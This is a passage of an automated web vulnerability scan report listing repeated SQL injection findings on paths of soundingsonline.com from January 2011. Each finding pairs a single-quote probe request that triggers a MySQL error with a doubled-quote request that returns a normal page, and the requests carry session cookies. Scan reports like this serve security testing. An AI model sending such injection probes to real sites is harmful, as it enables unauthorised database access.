<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.183. http://www.soundingsonline.com/news [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/news

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /news?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:25:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:25:19 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /news?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:25:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:25:28 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.184. http://www.soundingsonline.com/news/coastwise [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/news/coastwise

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /news/coastwise?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:24:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:24:55 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /news/coastwise?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:24:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:24:57 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.185. http://www.soundingsonline.com/news/dispatches [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/news/dispatches

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /news/dispatches?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:32:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:32:25 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /news/dispatches?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:32:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:32:27 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.186. http://www.soundingsonline.com/news/home-waters [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/news/home-waters

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /news/home-waters?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:25:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:25:17 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /news/home-waters?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:25:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:25:19 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.187. http://www.soundingsonline.com/news/mishaps-a-rescues [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/news/mishaps-a-rescues

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /news/mishaps-a-rescues?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:28:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:28:17 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /news/mishaps-a-rescues?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:28:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:28:19 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.188. http://www.soundingsonline.com/news/sailing [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/news/sailing

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /news/sailing?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:29:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:29:50 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /news/sailing?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:29:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:29:51 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.189. http://www.soundingsonline.com/news/todays-top-stories [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/news/todays-top-stories

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /news/todays-top-stories?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:25:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:25:03 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /news/todays-top-stories?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:25:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:25:06 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.190. http://www.soundingsonline.com/resources [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/resources

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /resources?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:39:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:39:33 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /resources?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:39:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:39:35 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.191. http://www.soundingsonline.com/site-map [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.soundingsonline.com
Path:	/site-map

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /site-map?1'=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:39:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:39:12 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...

Request 2

GET /site-map?1''=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295922239670; d4dad6935f632ac35975e3001dc7bbe8=pm6j9b9e7du5lte2aknnqnfrr1; count=2; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_sq=%5B%5BB%5D%5D; s_lv_s=First%20Visit; s_visit=1; s_vnum=1298514239669%26vn%3D1; s_invisit=true; s_cc=true; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295922240.1; __utmc=1; __utmb=1.2.10.1295922240;

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 04:39:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 04:39:15 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...

1.192. http://www.soundingsonline.com/subscription-services [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
